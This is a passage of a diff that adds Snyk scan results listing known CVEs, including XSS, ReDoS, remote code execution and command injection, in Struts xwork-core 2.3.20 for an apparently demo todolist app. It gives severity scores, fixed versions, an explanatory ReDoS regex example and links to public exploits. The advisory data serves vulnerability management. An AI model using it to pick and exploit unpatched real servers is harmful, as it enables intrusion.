"cvssV3Vector": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 8.8, + "modificationTime": "2024-03-11T09:46:29.964282Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", + "assigner": "Snyk", + "severity": "high", + "baseScore": 8.8, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T13:57:37.122257Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", + "assigner": "NVD", + "severity": "high", + "baseScore": 8.8, + "cvssVersion": "3.0", + "modificationTime": "2024-03-11T09:46:29.964282Z" + } + ], + "description": "## Overview\n[org.apache.struts.xwork:xwork-core](https://mvnrepository.com/artifact/org.apache.struts.xwork/xwork-core) is a generic command pattern framework. It forms the core of Struts 2.\n\nAffected versions of this package are vulnerable to Improper Input Validation via a `%{}` sequence in a tag attribute, aka forced double OGNL evaluation.\n## Remediation\nUpgrade `org.apache.struts.xwork:xwork-core` to version 2.3.28 or higher.\n## References\n- [GitHub Commit](https://github.com/apache/struts/commit/15857a69e7baf3675804495a5954cd0756ac8364)\n", + "epssDetails": { + "percentile": "0.88004", + "probability": "0.01731", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2016-0785" + ], + "CWE": [ + "CWE-20" + ] + }, + "packageName": "org.apache.struts.xwork:xwork-core", + "proprietary": false, + "creationTime": "2017-02-22T07:28:23.686000Z", + "functions_new": [], + "alternativeIds": [], + "disclosureTime": "2016-03-16T05:58:06Z", + "exploitDetails": { + "sources": [], + "maturityLevels": [ + { + "type": "secondary", + "level": "Not Defined", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Not Defined", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "org.apache.struts.xwork", + "artifactId": "xwork-core" + }, + "publicationTime": "2016-03-16T05:58:06Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:46:29.964282Z", + "socialTrendAlert": false, + "severityWithCritical": "high", + "from": [ + "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", + "org.apache.struts:struts2-core@2.3.20", + "org.apache.struts.xwork:xwork-core@2.3.20" + ], + "upgradePath": [ + false, + "org.apache.struts:struts2-core@2.3.28", + "org.apache.struts.xwork:xwork-core@2.3.28" + ], + "isUpgradable": true, + "isPatchable": false, + "name": "org.apache.struts.xwork:xwork-core", + "version": "2.3.20" + }, + { + "id": "SNYK-JAVA-ORGAPACHESTRUTSXWORK-30800", + "title": "Cross-site Scripting (XSS)", + "CVSSv3": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", + "credit": [ + "Unknown" + ], + "semver": { + "vulnerable": [ + "[2,2.3.25)" + ] + }, + "exploit": "Not Defined", + "fixedIn": [ + "2.3.25" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "medium", + "cvssScore": 6.1, + "functions": [], + "malicious": false, + "isDisputed": false, + "moduleName": "org.apache.struts.xwork:xwork-core", + "references": [ + { + "url": "https://github.com/apache/struts/commit/fc2179cf1ac9fbfb61e3430fa88b641d87253327", + "title": "GitHub Commit" + }, + { + "url": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2016-2162", + "title": "NVD" + } + ], + "cvssDetails": [ + { + "assigner": "NVD", + "severity": "medium", + "cvssV3Vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", + "cvssV3BaseScore": 6.1, + "modificationTime": "2024-03-11T09:46:47.186038Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", + "assigner": "Snyk", + "severity": "medium", + "baseScore": 6.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T13:57:24.610273Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", + "assigner": "NVD", + "severity": "medium", + "baseScore": 6.1, + "cvssVersion": "3.0", + "modificationTime": "2024-03-11T09:46:47.186038Z" + } + ], + "description": "## Overview\n[`org.apache.struts.xwork:xwork-core`](http://search.maven.org/#search%7Cga%7C1%7Ca%3A%22xwork-core%22)\nApache Struts 2.x before 2.3.25 does not sanitize text in the Locale object constructed by I18NInterceptor, which might allow remote attackers to conduct cross-site scripting (XSS) attacks via unspecified vectors involving language display.\n\n## Details\nA cross-site scripting attack occurs when the attacker tricks a legitimate web-based application or site to accept a request as originating from a trusted source.\r\n\r\nThis is done by escaping the context of the web application; the web application then delivers that data to its users along with other trusted dynamic content, without validating it. The browser unknowingly executes malicious script on the client side (through client-side languages; usually JavaScript or HTML) in order to perform actions that are otherwise typically blocked by the browser’s Same Origin Policy.\r\n\r\nֿInjecting malicious code is the most prevalent manner by which XSS is exploited; for this reason, escaping characters in order to prevent this manipulation is the top method for securing code against this vulnerability.\r\n\r\nEscaping means that the application is coded to mark key characters, and particularly key characters included in user input, to prevent those characters from being interpreted in a dangerous context. For example, in HTML, `<` can be coded as `<`; and `>` can be coded as `>`; in order to be interpreted and displayed as themselves in text, while within the code itself, they are used for HTML tags. If malicious content is injected into an application that escapes special characters and that malicious content uses `<` and `>` as HTML tags, those characters are nonetheless not interpreted as HTML tags by the browser if they’ve been correctly escaped in the application code and in this way the attempted attack is diverted.\r\n \r\nThe most prominent use of XSS is to steal cookies (source: OWASP HttpOnly) and hijack user sessions, but XSS exploits have been used to expose sensitive information, enable access to privileged services and functionality and deliver malware. \r\n\r\n### Types of attacks\r\nThere are a few methods by which XSS can be manipulated:\r\n\r\n|Type|Origin|Description|\r\n|--|--|--|\r\n|**Stored**|Server|The malicious code is inserted in the application (usually as a link) by the attacker. The code is activated every time a user clicks the link.|\r\n|**Reflected**|Server|The attacker delivers a malicious link externally from the vulnerable web site application to a user. When clicked, malicious code is sent to the vulnerable web site, which reflects the attack back to the user’s browser.| \r\n|**DOM-based**|Client|The attacker forces the user’s browser to render a malicious page. The data in the page itself delivers the cross-site scripting data.|\r\n|**Mutated**| |The attacker injects code that appears safe, but is then rewritten and modified by the browser, while parsing the markup. An example is rebalancing unclosed quotation marks or even adding quotation marks to unquoted parameters.|\r\n\r\n### Affected environments\r\nThe following environments are susceptible to an XSS attack:\r\n\r\n* Web servers\r\n* Application servers\r\n* Web application environments\r\n\r\n### How to prevent\r\nThis section describes the top best practices designed to specifically protect your code: \r\n\r\n* Sanitize data input in an HTTP request before reflecting it back, ensuring all data is validated, filtered or escaped before echoing anything back to the user, such as the values of query parameters during searches. \r\n* Convert special characters such as `?`, `&`, `/`, `<`, `>` and spaces to their respective HTML or URL encoded equivalents. \r\n* Give users the option to disable client-side scripts.\r\n* Redirect invalid requests.\r\n* Detect simultaneous logins, including those from two separate IP addresses, and invalidate those sessions.\r\n* Use and enforce a Content Security Policy (source: Wikipedia) to disable any features that might be manipulated for an XSS attack.\r\n* Read the documentation for any of the libraries referenced in your code to understand which elements allow for embedded HTML.\n\n\n## References\n- [NVD](https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2016-2162)", + "epssDetails": { + "percentile": "0.96202", + "probability": "0.18207", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2016-2162" + ], + "CWE": [ + "CWE-79" + ] + }, + "packageName": "org.apache.struts.xwork:xwork-core", + "proprietary": false, + "creationTime": "2017-02-22T07:28:23.701000Z", + "functions_new": [], + "alternativeIds": [], + "disclosureTime": "2016-03-16T07:51:26.242000Z", + "exploitDetails": { + "sources": [], + "maturityLevels": [ + { + "type": "secondary", + "level": "Not Defined", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Not Defined", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "org.apache.struts.xwork", + "artifactId": "xwork-core" + }, + "publicationTime": "2016-03-16T07:51:26.242000Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:46:47.186038Z", + "socialTrendAlert": false, + "severityWithCritical": "medium", + "from": [ + "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", + "org.apache.struts:struts2-core@2.3.20", + "org.apache.struts.xwork:xwork-core@2.3.20" + ], + "upgradePath": [ + false, + "org.apache.struts:struts2-core@2.3.28", + "org.apache.struts.xwork:xwork-core@2.3.28" + ], + "isUpgradable": true, + "isPatchable": false, + "name": "org.apache.struts.xwork:xwork-core", + "version": "2.3.20" + }, + { + "id": "SNYK-JAVA-ORGAPACHESTRUTSXWORK-30801", + "title": "Improper Input Validation", + "CVSSv3": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L", + "credit": [ + "Unknown" + ], + "semver": { + "vulnerable": [ + "[2,2.3.24.1]" + ] + }, + "exploit": "Not Defined", + "fixedIn": [], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "medium", + "cvssScore": 5.3, + "functions": [], + "malicious": false, + "isDisputed": false, + "moduleName": "org.apache.struts.xwork:xwork-core", + "references": [ + { + "url": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2016-3093", + "title": "NVD" + } + ], + "cvssDetails": [ + { + "assigner": "NVD", + "severity": "medium", + "cvssV3Vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L", + "cvssV3BaseScore": 5.3, + "modificationTime": "2024-03-11T09:46:50.033229Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L", + "assigner": "Snyk", + "severity": "medium", + "baseScore": 5.3, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T13:57:35.405967Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L", + "assigner": "NVD", + "severity": "medium", + "baseScore": 5.3, + "cvssVersion": "3.0", + "modificationTime": "2024-03-11T09:46:50.033229Z" + } + ], + "description": "## Overview\n[`org.apache.struts.xwork:xwork-core`](http://search.maven.org/#search%7Cga%7C1%7Ca%3A%22xwork-core%22)\nApache Struts 2.0.0 through 2.3.24.1 does not properly cache method references when used with OGNL before 3.0.12, which allows remote attackers to cause a denial of service (block access to a web site) via unspecified vectors.\n\n## References\n- [NVD](https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2016-3093)", + "epssDetails": { + "percentile": "0.90602", + "probability": "0.02732", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2016-3093" + ], + "CWE": [ + "CWE-20" + ] + }, + "packageName": "org.apache.struts.xwork:xwork-core", + "proprietary": false, + "creationTime": "2017-02-22T07:28:23.713000Z", + "functions_new": [], + "alternativeIds": [], + "disclosureTime": "2016-06-02T02:16:48.918000Z", + "exploitDetails": { + "sources": [], + "maturityLevels": [ + { + "type": "secondary", + "level": "Not Defined", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Not Defined", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "org.apache.struts.xwork", + "artifactId": "xwork-core" + }, + "publicationTime": "2016-06-02T02:16:48.918000Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:46:50.033229Z", + "socialTrendAlert": false, + "severityWithCritical": "medium", + "from": [ + "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", + "org.apache.struts:struts2-core@2.3.20", + "org.apache.struts.xwork:xwork-core@2.3.20" + ], + "upgradePath": [ + false, + "org.apache.struts:struts2-core@2.3.24.3", + "org.apache.struts.xwork:xwork-core@2.3.24.3" + ], + "isUpgradable": true, + "isPatchable": false, + "name": "org.apache.struts.xwork:xwork-core", + "version": "2.3.20" + }, + { + "id": "SNYK-JAVA-ORGAPACHESTRUTSXWORK-30802", + "title": "Access Restriction Bypass", + "CVSSv3": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N", + "credit": [ + "Takeshi Terada" + ], + "semver": { + "vulnerable": [ + "[2.3.20,2.3.28.1]" + ] + }, + "exploit": "Not Defined", + "fixedIn": [], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "high", + "cvssScore": 7.5, + "functions": [], + "malicious": false, + "isDisputed": false, + "moduleName": "org.apache.struts.xwork:xwork-core", + "references": [ + { + "url": "https://github.com/apache/struts/commit/b28b78c062f0bf3c79793a25aab8c9b6c12bce6e", + "title": "GitHub Commit" + }, + { + "url": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2016-4433", + "title": "NVD" + } + ], + "cvssDetails": [ + { + "assigner": "NVD", + "severity": "high", + "cvssV3Vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N", + "cvssV3BaseScore": 7.5, + "modificationTime": "2024-03-11T09:46:52.478661Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N", + "assigner": "Snyk", + "severity": "high", + "baseScore": 7.5, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T13:57:39.417349Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N", + "assigner": "NVD", + "severity": "high", + "baseScore": 7.5, + "cvssVersion": "3.0", + "modificationTime": "2024-03-11T09:46:52.478661Z" + } + ], + "description": "## Overview\n[org.apache.struts.xwork:xwork-core](https://mvnrepository.com/artifact/org.apache.struts.xwork/xwork-core) is a generic command pattern framework. It forms the core of Struts 2.\n\nAffected versions of this package are vulnerable to Access Restriction Bypass. It allows remote attackers to bypass intended access restrictions and conduct redirection attacks via a crafted request.\n## Remediation\n## References\n- [GitHub Commit](https://github.com/apache/struts/commit/b28b78c062f0bf3c79793a25aab8c9b6c12bce6e)\n- [NVD](https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2016-4433)\n", + "epssDetails": { + "percentile": "0.77304", + "probability": "0.00531", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2016-4433" + ], + "CWE": [ + "CWE-20" + ] + }, + "packageName": "org.apache.struts.xwork:xwork-core", + "proprietary": false, + "creationTime": "2017-02-22T07:28:23.724000Z", + "functions_new": [], + "alternativeIds": [], + "disclosureTime": "2016-06-21T01:33:07Z", + "exploitDetails": { + "sources": [], + "maturityLevels": [ + { + "type": "secondary", + "level": "Not Defined", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Not Defined", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "org.apache.struts.xwork", + "artifactId": "xwork-core" + }, + "publicationTime": "2016-06-21T01:33:07Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:46:52.478661Z", + "socialTrendAlert": false, + "severityWithCritical": "high", + "from": [ + "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", + "org.apache.struts:struts2-core@2.3.20", + "org.apache.struts.xwork:xwork-core@2.3.20" + ], + "upgradePath": [ + false, + "org.apache.struts:struts2-core@2.3.29", + "org.apache.struts.xwork:xwork-core@2.3.29" + ], + "isUpgradable": true, + "isPatchable": false, + "name": "org.apache.struts.xwork:xwork-core", + "version": "2.3.20" + }, + { + "id": "SNYK-JAVA-ORGAPACHESTRUTSXWORK-30803", + "title": "Arbitrary Code Execution", + "CVSSv3": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", + "credit": [ + "Alvaro Munoz" + ], + "semver": { + "vulnerable": [ + "[2.2.1,2.3.28.1]" + ] + }, + "exploit": "Not Defined", + "fixedIn": [], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "high", + "cvssScore": 8.8, + "functions": [], + "malicious": false, + "isDisputed": false, + "moduleName": "org.apache.struts.xwork:xwork-core", + "references": [ + { + "url": "https://struts.apache.org/docs/s2-036.html", + "title": "Apache Security Advisory" + } + ], + "cvssDetails": [ + { + "assigner": "NVD", + "severity": "high", + "cvssV3Vector": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 8.8, + "modificationTime": "2024-03-11T09:46:55.264787Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", + "assigner": "Snyk", + "severity": "high", + "baseScore": 8.8, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T13:57:49.390018Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", + "assigner": "NVD", + "severity": "high", + "baseScore": 8.8, + "cvssVersion": "3.0", + "modificationTime": "2024-03-11T09:46:55.264787Z" + } + ], + "description": "## Overview\n[`org.apache.struts.xwork:xwork-core`](http://search.maven.org/#search%7Cga%7C1%7Ca%3A%22xwork-core%22)\nAffected versions of the package are vulnerable to Remote code Execution. The Apache Struts frameworks when forced, performs double evaluation of attributes' values assigned to certain tags so it is possible to pass in a value that will be evaluated again when a tag's attributes will be rendered.\n\n## References\n- [Apache Security Advisory](https://struts.apache.org/docs/s2-036.html)\n", + "epssDetails": { + "percentile": "0.94726", + "probability": "0.09408", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2016-4461" + ], + "CWE": [ + "CWE-264" + ] + }, + "packageName": "org.apache.struts.xwork:xwork-core", + "proprietary": false, + "creationTime": "2017-02-22T07:28:23.738000Z", + "functions_new": [], + "alternativeIds": [], + "disclosureTime": "2016-11-14T07:48:03.440000Z", + "exploitDetails": { + "sources": [], + "maturityLevels": [ + { + "type": "secondary", + "level": "Not Defined", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Not Defined", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "org.apache.struts.xwork", + "artifactId": "xwork-core" + }, + "publicationTime": "2016-11-14T07:48:03.440000Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:46:55.264787Z", + "socialTrendAlert": false, + "severityWithCritical": "high", + "from": [ + "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", + "org.apache.struts:struts2-core@2.3.20", + "org.apache.struts.xwork:xwork-core@2.3.20" + ], + "upgradePath": [ + false, + "org.apache.struts:struts2-core@2.3.29", + "org.apache.struts.xwork:xwork-core@2.3.29" + ], + "isUpgradable": true, + "isPatchable": false, + "name": "org.apache.struts.xwork:xwork-core", + "version": "2.3.20" + }, + { + "id": "SNYK-JAVA-ORGAPACHESTRUTSXWORK-30804", + "title": "Regular Expression Denial of Service (ReDoS)", + "CVSSv3": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L", + "credit": [ + "Unknown" + ], + "semver": { + "vulnerable": [ + "[2.3.20, 2.3.29)" + ] + }, + "exploit": "Not Defined", + "fixedIn": [ + "2.3.29" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "medium", + "cvssScore": 5.3, + "functions": [], + "malicious": false, + "isDisputed": false, + "moduleName": "org.apache.struts.xwork:xwork-core", + "references": [ + { + "url": "https://github.com/apache/struts/commit/a0fdca138feec2c2e94eb75ca1f8b76678b4d152", + "title": "GitHub Commit" + }, + { + "url": "https://github.com/apache/struts/commit/eccc31ebce5430f9e91b9684c63eaaf885e603f9", + "title": "GitHub Commit" + }, + { + "url": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2016-4465", + "title": "NVD" + } + ], + "cvssDetails": [ + { + "assigner": "NVD", + "severity": "medium", + "cvssV3Vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L", + "cvssV3BaseScore": 5.3, + "modificationTime": "2024-03-11T09:46:51.243501Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L", + "assigner": "Snyk", + "severity": "medium", + "baseScore": 5.3, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T13:57:37.316157Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L", + "assigner": "NVD", + "severity": "medium", + "baseScore": 5.3, + "cvssVersion": "3.0", + "modificationTime": "2024-03-11T09:46:51.243501Z" + } + ], + "description": "## Overview\n[org.apache.struts.xwork:xwork-core](https://mvnrepository.com/artifact/org.apache.struts.xwork/xwork-core) is a generic command pattern framework. It forms the core of Struts 2.\n\nAffected versions of this package are vulnerable to Regular Expression Denial of Service (ReDoS). The URLValidator class allows remote attackers to cause a denial of service via a null value for a URL field.\n\n## Details\n\nDenial of Service (DoS) describes a family of attacks, all aimed at making a system inaccessible to its original and legitimate users. There are many types of DoS attacks, ranging from trying to clog the network pipes to the system by generating a large volume of traffic from many machines (a Distributed Denial of Service - DDoS - attack) to sending crafted requests that cause a system to crash or take a disproportional amount of time to process.\n\nThe Regular expression Denial of Service (ReDoS) is a type of Denial of Service attack. Regular expressions are incredibly powerful, but they aren't very intuitive and can ultimately end up making it easy for attackers to take your site down.\n\nLet’s take the following regular expression as an example:\n```js\nregex = /A(B|C+)+D/\n```\n\nThis regular expression accomplishes the following:\n- `A` The string must start with the letter 'A'\n- `(B|C+)+` The string must then follow the letter A with either the letter 'B' or some number of occurrences of the letter 'C' (the `+` matches one or more times). The `+` at the end of this section states that we can look for one or more matches of this section.\n- `D` Finally, we ensure this section of the string ends with a 'D'\n\nThe expression would match inputs such as `ABBD`, `ABCCCCD`, `ABCBCCCD` and `ACCCCCD`\n\nIt most cases, it doesn't take very long for a regex engine to find a match:\n\n```bash\n$ time node -e '/A(B|C+)+D/.test(\"ACCCCCCCCCCCCCCCCCCCCCCCCCCCCD\")'\n0.04s user 0.01s system 95% cpu 0.052 total\n\n$ time node -e '/A(B|C+)+D/.test(\"ACCCCCCCCCCCCCCCCCCCCCCCCCCCCX\")'\n1.79s user 0.02s system 99% cpu 1.812 total\n```\n\nThe entire process of testing it against a 30 characters long string takes around ~52ms. But when given an invalid string, it takes nearly two seconds to complete the test, over ten times as long as it took to test a valid string. The dramatic difference is due to the way regular expressions get evaluated.\n\nMost Regex engines will work very similarly (with minor differences). The engine will match the first possible way to accept the current character and proceed to the next one. If it then fails to match the next one, it will backtrack and see if there was another way to digest the previous character. If it goes too far down the rabbit hole only to find out the string doesn’t match in the end, and if many characters have multiple valid regex paths, the number of backtracking steps can become very large, resulting in what is known as _catastrophic backtracking_.\n\nLet's look at how our expression runs into this problem, using a shorter string: \"ACCCX\". While it seems fairly straightforward, there are still four different ways that the engine could match those three C's:\n1. CCC\n2. CC+C\n3. C+CC\n4. C+C+C.\n\nThe engine has to try each of those combinations to see if any of them potentially match against the expression. When you combine that with the other steps the engine must take, we can use [RegEx 101 debugger](https://regex101.com/debugger) to see the engine has to take a total of 38 steps before it can determine the string doesn't match.\n\nFrom there, the number of steps the engine must use to validate a string just continues to grow.\n\n| String | Number of C's | Number of steps |\n| -------|-------------:| -----:|\n| ACCCX | 3 | 38\n| ACCCCX | 4 | 71\n| ACCCCCX | 5 | 136\n| ACCCCCCCCCCCCCCX | 14 | 65,553\n\n\nBy the time the string includes 14 C's, the engine has to take over 65,000 steps just to see if the string is valid. These extreme situations can cause them to work very slowly (exponentially related to input size, as shown above), allowing an attacker to exploit this and can cause the service to excessively consume CPU, resulting in a Denial of Service.\n\n## Remediation\nUpgrade `org.apache.struts.xwork:xwork-core` to version 2.3.29 or higher.\n## References\n- [GitHub Commit](https://github.com/apache/struts/commit/a0fdca138feec2c2e94eb75ca1f8b76678b4d152)\n- [GitHub Commit](https://github.com/apache/struts/commit/eccc31ebce5430f9e91b9684c63eaaf885e603f9)\n- [NVD](https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2016-4465)\n", + "epssDetails": { + "percentile": "0.99401", + "probability": "0.95900", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2016-4465" + ], + "CWE": [ + "CWE-20" + ] + }, + "packageName": "org.apache.struts.xwork:xwork-core", + "proprietary": false, + "creationTime": "2017-02-22T07:28:23.751000Z", + "functions_new": [], + "alternativeIds": [], + "disclosureTime": "2016-06-20T07:45:43Z", + "exploitDetails": { + "sources": [], + "maturityLevels": [ + { + "type": "secondary", + "level": "Not Defined", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Not Defined", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "org.apache.struts.xwork", + "artifactId": "xwork-core" + }, + "publicationTime": "2016-06-20T07:45:43Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:46:51.243501Z", + "socialTrendAlert": false, + "severityWithCritical": "medium", + "from": [ + "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", + "org.apache.struts:struts2-core@2.3.20", + "org.apache.struts.xwork:xwork-core@2.3.20" + ], + "upgradePath": [ + false, + "org.apache.struts:struts2-core@2.3.29", + "org.apache.struts.xwork:xwork-core@2.3.29" + ], + "isUpgradable": true, + "isPatchable": false, + "name": "org.apache.struts.xwork:xwork-core", + "version": "2.3.20" + }, + { + "id": "SNYK-JAVA-ORGAPACHESTRUTSXWORK-451611", + "title": "Command Injection", + "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:H/RL:O/RC:C", + "credit": [ + "Unknown" + ], + "semver": { + "vulnerable": [ + "[2.0.0, 2.3.20.2)", + "[2.3.24, 2.3.24.2)", + "[2.3.28, 2.3.28.1)" + ] + }, + "exploit": "High", + "fixedIn": [ + "2.3.20.2", + "2.3.24.2", + "2.3.28.1" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "high", + "cvssScore": 8.1, + "functions": [], + "malicious": false, + "isDisputed": false, + "moduleName": "org.apache.struts.xwork:xwork-core", + "references": [ + { + "url": "https://exploit-db.com/exploits/39756", + "title": "Exploit DB" + }, + { + "url": "https://github.com/apache/struts/commit/f238cf4f1091be19fbcfd086b042c86a1bcaa7fc", + "title": "GitHub Commit" + }, + { + "url": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2016-3081", + "title": "NVD" + }, + { + "url": "https://www.exploit-db.com/exploits/39756", + "title": "Exploit DB" + }, + { + "url": "https://github.com/projectdiscovery/nuclei-templates/blob/master/cves/2016/CVE-2016-3081.yaml", + "title": "Nuclei Templates" + } + ], + "cvssDetails": [ + { + "assigner": "NVD", + "severity": "high", + "cvssV3Vector": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 8.1, + "modificationTime": "2024-03-11T09:46:47.334921Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:H/RL:O/RC:C", + "assigner": "Snyk", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T13:58:02.554699Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "NVD", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.0", + "modificationTime": "2024-03-11T09:46:47.334921Z" + } + ], + "description": "## Overview\n[org.apache.struts.xwork:xwork-core](https://mvnrepository.com/artifact/org.apache.struts.xwork/xwork-core) is a generic command pattern framework. It forms the core of Struts 2.\n\nAffected versions of this package are vulnerable to Command Injection. When Dynamic Method Invocation was enabled, a remote attackers could execute arbitrary code via the prefix method, related to chained expressions.\n## Remediation\nUpgrade `org.apache.struts.xwork:xwork-core` to version 2.3.20.2, 2.3.24.2, 2.3.28.1 or higher.\n## References\n- [Exploit DB](https://exploit-db.com/exploits/39756)\n- [GitHub Commit](https://github.com/apache/struts/commit/f238cf4f1091be19fbcfd086b042c86a1bcaa7fc)\n- [NVD](https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2016-3081)\n- [Exploit DB](https://www.exploit-db.com/exploits/39756)\n- [Nuclei Templates](https://github.com/projectdiscovery/nuclei-templates/blob/master/cves/2016/CVE-2016-3081.yaml)\n", + "epssDetails": { + "percentile": "0.99987", + "probability": "0.97524", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2016-3081" + ], + "CWE": [ + "CWE-77" + ] + }, + "packageName": "org.apache.struts.xwork:xwork-core", + "proprietary": false, + "creationTime": "2019-07-16T11:38:49.236917Z", + "functions_new": [], + "alternativeIds": [], + "disclosureTime": "2016-04-22T04:32:51Z", + "exploitDetails": { + "sources": [ + "ExploitDB", + "Nuclei Templates", + "Snyk" + ], + "maturityLevels": [ + { + "type": "secondary", + "level": "High", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Proof of Concept", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "org.apache.struts.xwork", + "artifactId": "xwork-core" + }, + "publicationTime": "2016-04-22T04:32:51Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-06-03T08:53:20.892839Z", + "socialTrendAlert": false, + "severityWithCritical": "high", + "from": [ + 